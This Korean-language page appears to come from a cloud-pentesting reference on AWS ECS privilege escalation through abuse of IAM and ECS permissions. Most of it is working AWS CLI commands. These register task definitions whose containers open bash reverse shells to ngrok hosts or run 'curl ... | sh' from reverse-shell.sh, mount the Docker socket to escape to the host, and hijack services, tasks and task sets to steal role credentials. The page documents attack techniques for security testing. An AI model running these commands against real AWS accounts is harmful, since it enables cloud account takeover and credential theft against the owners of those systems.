iam:PassRole, ecs:RegisterTaskDefinition 및 ecs:RunTask 권한을 악용하는 공격자는 악성 컨테이너가 메타데이터 자격 증명을 훔치는 새로운 작업 정의를 생성하고 실행할 수 있습니다.
# Generate task definition with rev shellawsecsregister-task-definition--familyiam_exfiltration \--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \--network-mode "awsvpc" \--cpu 256--memory512\--requires-compatibilities "[\"FARGATE\"]" \--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"# Run task definitionawsecsrun-task--task-definitioniam_exfiltration \--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \--launch-type FARGATE \--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"# Delete task definition## You need to remove all the versions (:1 is enough if you just created one)awsecsderegister-task-definition--task-definitioniam_exfiltration:1
이전 예제와 마찬가지로, 공격자가 ECS에서 iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask 권한을 악용하면 악성 컨테이너가 포함된 새로운 작업 정의를 생성하고 실행할 수 있습니다.
그러나 이 경우, 악성 작업 정의를 실행할 컨테이너 인스턴스가 필요합니다.
# Generate task definition with rev shellawsecsregister-task-definition--familyiam_exfiltration \--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \--network-mode "awsvpc" \--cpu 256--memory512\--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"awsecsstart-task--task-definitioniam_exfiltration \--container-instances <instance_id># Delete task definition## You need to remove all the versions (:1 is enough if you just created one)awsecsderegister-task-definition--task-definitioniam_exfiltration:1
이전 예제와 마찬가지로 공격자가 ECS에서 iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService 또는 ecs:CreateService 권한을 악용하면 악성 컨테이너가 포함된 새로운 작업 정의를 생성하고, 최소 1개의 작업이 실행되는 새로운 서비스를 생성하여 실행할 수 있습니다.
# Generate task definition with rev shellawsecsregister-task-definition--familyiam_exfiltration \--task-role-arn "$ECS_ROLE_ARN" \--network-mode "awsvpc" \--cpu 256--memory512\--requires-compatibilities "[\"FARGATE\"]" \--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"# Run the task creating a serviceawsecscreate-service--service-nameexfiltration \--task-definition iam_exfiltration \--desired-count 1 \--cluster "$CLUSTER_ARN" \--launch-type FARGATE \--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"# Run the task updating a serviceawsecsupdate-service--cluster<CLUSTERNAME> \--service <SERVICENAME> \--task-definition <NEWTASKDEFINITIONNAME>
이 시나리오는 이전과 유사하지만 iam:PassRole 권한이 없습니다.
여전히 흥미로운 점은 임의의 컨테이너를 실행할 수 있다면, 역할 없이도 특권 컨테이너를 실행하여 노드로 탈출하고 EC2 IAM 역할 및 노드에서 실행 중인 다른 ECS 컨테이너 역할을 훔칠 수 있습니다.
또한 당신이 손상시킨 EC2 인스턴스 내에서 다른 작업을 실행하도록 강제할 수 있습니다 그들의 자격 증명을 훔치기 위해 (자세한 내용은 노드에 대한 권한 상승 섹션에서 논의됨).
이 공격은 ECS 클러스터가 EC2 인스턴스를 사용하고 Fargate가 아닐 때만 가능합니다.
printf'[{"name":"exfil_creds","image":"python:latest","entryPoint":["sh", "-c"],"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],"mountPoints": [{"readOnly": false,"containerPath": "/var/run/docker.sock","sourceVolume": "docker-socket"}]}]'>/tmp/task.jsonprintf'[{"name": "docker-socket","host": {"sourcePath": "/var/run/docker.sock"}}]'>/tmp/volumes.jsonawsecsregister-task-definition--familyiam_exfiltration \--cpu 256--memory512 \--requires-compatibilities '["EC2"]' \--container-definitions file:///tmp/task.json \--volumes file:///tmp/volumes.jsonawsecsrun-task--task-definitioniam_exfiltration \--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \--launch-type EC2# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
ecs:ExecuteCommand, ecs:DescribeTasks 권한을 가진 공격자는 실행 중인 컨테이너 내에서 명령을 실행하고 연결된 IAM 역할을 유출할 수 있습니다 (이 작업을 수행하려면 aws ecs execute-command를 실행하는 데 필요한 설명 권한이 필요합니다).
그러나 그렇게 하려면 컨테이너 인스턴스가 ExecuteCommand 에이전트를 실행 중이어야 합니다 (기본적으로 실행되지 않음).
따라서 공격자는 다음을 시도할 수 있습니다:
모든 실행 중인 컨테이너에서 명령을 실행해 보십시오
# List enableExecuteCommand on each taskfor cluster in $(awsecslist-clusters|jq.clusterArns|grep'"'|cut-d'"'-f2); doecho"Cluster $cluster"for task in $(awsecslist-tasks--cluster"$cluster"|jq.taskArns|grep'"'|cut-d'"'-f2); doecho" Task $task"# If true, it's your lucky dayawsecsdescribe-tasks--cluster"$cluster"--tasks"$task"|grepenableExecuteCommanddonedone# Execute a shell in a containerawsecsexecute-command--interactive \--command "sh" \--cluster "$CLUSTER_ARN" \--task "$TASK_ARN"
그가 ecs:RunTask 권한이 있다면, aws ecs run-task --enable-execute-command [...]로 작업을 실행합니다.
그가 ecs:StartTask 권한이 있다면, aws ecs start-task --enable-execute-command [...]로 작업을 실행합니다.
그가 ecs:CreateService 권한이 있다면, aws ecs create-service --enable-execute-command [...]로 서비스를 생성합니다.
그가 ecs:UpdateService 권한이 있다면, aws ecs update-service --enable-execute-command [...]로 서비스를 업데이트합니다.
이 옵션들의 예시는 이전 ECS privesc 섹션에서 찾을 수 있습니다.
잠재적 영향: 컨테이너에 연결된 다른 역할로의 권한 상승.
ssm:StartSession
ssm privesc 페이지에서 이 권한을 어떻게 악용하여 ECS로 권한 상승할 수 있는지 확인하세요:
iam:PassRole, ec2:RunInstances
ec2 privesc 페이지에서 이 권한들을 어떻게 악용하여 ECS로 권한 상승할 수 있는지 확인하세요:
?ecs:RegisterContainerInstance
TODO: 공격자가 제어하는 머신에서 작업이 실행되도록 다른 AWS 계정에서 인스턴스를 등록할 수 있는지??
ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, 및 ecs:DescribeTaskSets 권한을 가진 공격자는 기존 ECS 서비스에 대해 악성 작업 세트를 생성하고 기본 작업 세트를 업데이트할 수 있습니다. 이를 통해 공격자는 서비스 내에서 임의의 코드를 실행할 수 있습니다.
bashCopycode#Registerataskdefinitionwithareverseshellecho'{"family": "malicious-task","containerDefinitions": [{"name": "malicious-container","image": "alpine","command": ["sh","-c","apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"]}]}'>malicious-task-definition.jsonawsecsregister-task-definition--cli-input-jsonfile://malicious-task-definition.json# Create a malicious task set for the existing serviceawsecscreate-task-set--clusterexisting-cluster--serviceexisting-service--task-definitionmalicious-task--network-configuration"awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"# Update the primary task set for the serviceawsecsupdate-service-primary-task-set--clusterexisting-cluster--serviceexisting-service--primary-task-setarn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
잠재적 영향: 영향을 받는 서비스에서 임의의 코드를 실행하여 기능에 영향을 미치거나 민감한 데이터를 유출할 수 있습니다.